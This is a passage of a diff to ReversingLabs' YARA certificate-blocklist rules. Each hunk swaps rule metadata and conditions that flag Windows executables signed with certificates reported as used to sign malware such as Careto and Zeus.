"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c9f91edb525a02041bc20dff25ec58323f8fabd4d2a2eca63238ecb10ccef2a6" score = 75 quality = 90 tags = "INFO, FILE" @@ -8812,22 +28603,22 @@ rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Ringen" and pe.signatures[i].serial=="1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" and 1603176940<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bit9, Inc" and pe.signatures[i].serial=="7c:c1:db:2a:d0:a2:90:a4:bf:e7:a5:f3:36:d6:80:0c" and 1342051200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_13C8351Aece71C731158980F575F4133 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64007bd7-b273-5579-8224-68337f1bc54d" + id = "b6a1eb97-f0da-571e-951c-57f49cf62057" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5974-L5990" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "08a1ff7cc3a7680fdbb3235a7b46709cd4ba530a9afeab4344671db9fe893cc4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L99-L115" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f96723845adc8030b72c119311103d5c2cf136e79de226d31141d8b925ce8e75" score = 75 quality = 90 tags = "INFO, FILE" @@ -8837,22 +28628,22 @@ rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures[i].serial=="6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" and 1603046620<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Opera Software ASA" and pe.signatures[i].serial=="13:c8:35:1a:ec:e7:1c:73:11:58:98:0f:57:5f:41:33" and 1371513600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4531954F6265304055F66Ce4F624F95B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "11fd3bbe-5d15-57b7-a461-fc9c90046dbc" + id = "da1aaa4c-ac71-5c4c-b663-3d1b57d69040" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5992-L6008" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ec5eb8ff1f630284fabfba5c58dd563d471343ace718f79dad08cfe75c3070d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L117-L133" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58d3a2a5e3f6730f329bddb171ad6332794fa95848825b892c3b8324f503ae89" score = 75 quality = 90 tags = "INFO, FILE" @@ -8862,22 +28653,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SNAB-RESURS, OOO" and pe.signatures[i].serial=="0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" and 1598662800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IDAutomation.com" and pe.signatures[i].serial=="45:31:95:4f:62:65:30:40:55:f6:6c:e4:f6:24:f9:5b" and 1384819199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0E808F231515Bc519Eea1A73Cdf3266F : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Careto malware." author = "ReversingLabs" - id = "68e2fdc7-61cd-5e0a-8bc7-5e0ca96271c5" + id = "1f1eb5c2-bfef-58df-b51e-c558d87cd5d2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6010-L6028" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6f6e0e175caee83eaec2dacedaf564b642195a8815cfd0d4564f581070b0c545" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L135-L151" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "05e466e304ed7a8f5c1c93aac4a4b7019d6fb1e07aeb45d078b657f838d1f3bd" score = 75 quality = 90 tags = "INFO, FILE" @@ -8887,22 +28678,22 @@ rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Information Civilized System Oy" and (pe.signatures[i].serial=="00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" or pe.signatures[i].serial=="97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8") and 1602636910<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TecSystem Ltd." and pe.signatures[i].serial=="0e:80:8f:23:15:15:bc:51:9e:ea:1a:73:cd:f3:26:6f" and 1468799999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_36Be4Ad457F062Fa77D87595B8Ccc8Cf : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Careto malware." author = "ReversingLabs" - id = "9279d4ee-3f53-5d68-aaa1-af6ed579310f" + id = "224ec8ed-e4f0-5d1b-8cdd-a669a7e3e859" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6030-L6046" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0444a5052ee384451ebd85918bbc6bf6d6a75334899a63a8b5828ef06cb9c7ca" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L153-L169" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d19a6f22a1e702a4da69c867195722adf8f1dd84539f2c584af428fe4b1caf79" score = 75 quality = 90 tags = "INFO, FILE" @@ -8912,22 +28703,22 @@ rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hairis LLC" and pe.signatures[i].serial=="18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" and 1602234590<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TecSystem Ltd." and pe.signatures[i].serial=="36:be:4a:d4:57:f0:62:fa:77:d8:75:95:b8:cc:c8:cf" and 1372377599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_75A38507Bf403B152125B8F5Ce1B97Ad : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Zeus malware." author = "ReversingLabs" - id = "f039f379-e3d5-56bd-83b7-016881538017" + id = "6805abd8-217e-5179-ab5a-297e2a17e65e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6048-L6066" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6e78750d6aca91e9e6d8f2651a5682ccdab5cd20ee3a74e1f8582eb7bc45d614" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L171-L187" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "af21cee3ee92268c3aa0106a245e5a00c5ba892fca3e4fd2dc55e302ed5d470a" score = 75 quality = 90 tags = "INFO, FILE" @@ -8937,22 +28728,22 @@ rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Absolut LLC" and (pe.signatures[i].serial=="00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" or pe.signatures[i].serial=="b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0") and 1602612570<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "isonet ag" and pe.signatures[i].serial=="75:a3:85:07:bf:40:3b:15:21:25:b8:f5:ce:1b:97:ad" and 1395359999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Effa8B216E24B16202940C1Bc2Fa8A5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e1f56719-e726-5f81-99d4-937e343cbcc9" + id = "541a169e-a263-5901-9d8e-768306b8b8ba" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6068-L6084" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e1a3f27b8b9b642fe1ca73ec54d225f4470b53d0d06f2eea55ad1ad43ec67b39" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L189-L205" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b5282fc85bbbee50c5307fff923e9e477fed8c011288e2ebd61c4b3ee801bc62" score = 75 quality = 90 tags = "INFO, FILE" @@ -8962,22 +28753,22 @@ rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VENTE DE TOUT" and pe.signatures[i].serial=="2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" and 1601830010<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Henan Maijiamai Technology Co., Ltd." and pe.signatures[i].serial=="4e:ff:a8:b2:16:e2:4b:16:20:29:40:c1:bc:2f:a8:a5" and 1404691199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_57D7153A89Bbf4729Be87F3C927043Aa : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "30108ce3-b133-5e1d-924f-7caaf390e836" + id = "9b778a20-8a0c-5c9f-8cc3-9e5054713e13" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6086-L6102" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6986e7bd90842647ec6a168c30dca2d5ae8ae5b1c1014f966dd596a78859ac6e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L207-L223" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a8de7951bd25c8a9346ef341d8bf9c9147f9fa6913e952be40fb43d3d7a370c1" score = 75 quality = 90 tags = "INFO, FILE" @@ -8987,22 +28778,22 @@ rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RASSVET, OOO" and pe.signatures[i].serial=="4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" and 1603230930<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, zhenganjun" and pe.signatures[i].serial=="57:d7:15:3a:89:bb:f4:72:9b:e8:7f:3c:92:70:43:aa" and 1469059200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_028E1Deccf93D38Ecf396118Dfe908B4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "86644ef8-4218-5a04-9655-c7d51729872d" + id = "6dfb0181-299f-5a28-b647-137d75f747a6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6104-L6120" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f51556a8a12affbd7f7633bf8daa50e6332fa3d3448ea08853cf8ed28e593680" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L225-L241" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b07c797652ef19c7e0b23c3eddbbbf2700160d743d71a0005b950160474638d8" score = 75 quality = 90 tags = "INFO, FILE" @@ -9012,22 +28803,22 @@ rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MAITLAND TRIFECTA, INC." and pe.signatures[i].serial=="64:cd:30:3f:a2:89:79:0a:fa:03:c4:03:e9:24:00:02" and 1602723600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fortuna Games Co., Ltd." and pe.signatures[i].serial=="02:8e:1d:ec:cf:93:d3:8e:cf:39:61:18:df:e9:08:b4" and 1392163199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_40575Df73Eaa1B6140C7Ef62C08Bf216 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9c16c370-a382-54f7-ba2e-3b738740966f" + id = "6a6e6320-8e01-5ec7-8119-3e90f1eacc4e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6122-L6138" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e741fc13fe4d03b145ed1d86e738b415a7260eae5b0908c6991c9ea9896f14cf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L243-L259" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7da8e98f38413e5cbb18e3c7771c530afb766dd9fbeb8fdd2264617aff24f920" score = 75 quality = 90 tags = "INFO, FILE" @@ -9037,22 +28828,22 @@ rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fubon Technologies Ltd" and pe.signatures[i].serial=="07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" and 1602740890<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dali Feifang Tech Co.,LTD." and pe.signatures[i].serial=="40:57:5d:f7:3e:aa:1b:61:40:c7:ef:62:c0:8b:f2:16" and 1394063999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_049Ce8C47F1F0E650Cb086F0Cfa7Ca53 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1bbaebe9-b3ca-5ee2-91ac-b2343ca8bb86" + id = "aebba591-2024-584a-bba6-9a27049cf4b8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6140-L6158" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cea0d217206562c0045843405802d3b2fad01bdb2a4cfb52057625b43f5f8eee" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L261-L277" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9ae4a236e1252afc1db6fae4e388a53ebde7e724cc07c213d4bfc176cf0a0096" score = 75 quality = 90 tags = "INFO, FILE" @@ -9062,22 +28853,22 @@ rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Incar LLC" and (pe.signatures[i].serial=="00:be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" or pe.signatures[i].serial=="be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34") and 1602530730<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Select'Assistance Pro" and pe.signatures[i].serial=="04:9c:e8:c4:7f:1f:0e:65:0c:b0:86:f0:cf:a7:ca:53" and 1393804799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_29F42680E653Cf8Fafd0E935553F7E86 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1eed6f30-0648-5b8e-81ff-9f3af0f1c91d" + id = "f616e92c-ed9f-581c-aa15-970bddfb073a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6160-L6178" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9e23ff26d3e1ea181e48fc23383e3717804858bc517a31ec508fa0753730c78e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L279-L295" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6c726e4c2933a6472d256a18ea5265660ff035d05036ab9cae3409ab5a7c7598" score = 75 quality = 90 tags = "INFO, FILE" @@ -9087,22 +28878,22 @@ rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABEL RENOVATIONS, INC." and (pe.signatures[i].serial=="00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" or pe.signatures[i].serial=="f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7") and 1602542033<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wemade Entertainment co.,Ltd" and pe.signatures[i].serial=="29:f4:26:80:e6:53:cf:8f:af:d0:e9:35:55:3f:7e:86" and 1390175999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C15 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7f7ecbcd-7a92-526d-99a8-d849fffa19cb" + id = "4a7a5404-1a20-53a7-9670-6f5215582c9d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6180-L6196" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7030c122905105c72833cfcb41692bd9a67cf456e3309afce0b8f9e65c6aa5c1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L297-L313" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1ee88813270dddeeedd90edbce9be2ce74303a6799ee64b0e9bfaea7377d3b2d" score = 75 quality = 90 tags = "INFO, FILE" @@ -9112,22 +28903,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LEVEL LIST SP Z O O" and pe.signatures[i].serial=="0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" and 1603036100<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "William Richard John" and pe.signatures[i].serial=="0c:15" and 1387324799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C0F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5b2876a2-8dfa-5456-a615-4ea69df53422" + id = "919a62ba-2902-5088-ad92-9f1bae23e68f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6198-L6214" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f84568cfe6304af0307a34bfed6dd346a74e714005b5e6f22a354b14f853ec65" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L315-L331" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0f8fda07dc362b7e04892446f1abe1e5f5717ee715824a2c1f6550096c366701" score = 75 quality = 90 tags = "INFO, FILE" @@ -9137,22 +28928,22 @@ rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Umbrella LLC" and pe.signatures[i].serial=="12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" and 1599181200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dmitry Vasilev" and pe.signatures[i].serial=="0c:0f" and 1386719999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_06A164Ec5978497741Ee6Cec9966871B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "088f0f98-328b-50fa-b1e4-1d80023b3c09" + id = "6c73206d-3d5c-5540-a2e1-d00138d7e1b5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6216-L6234" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b7ed87a03f20872669369cc3cad4eae40ba597f06222194bd67262c094083ec1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L333-L349" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8a27015d94a3bd8543a8ca9202831ffc9c9e65f61bf26ed6825c3e746b6af0d4" score = 75 quality = 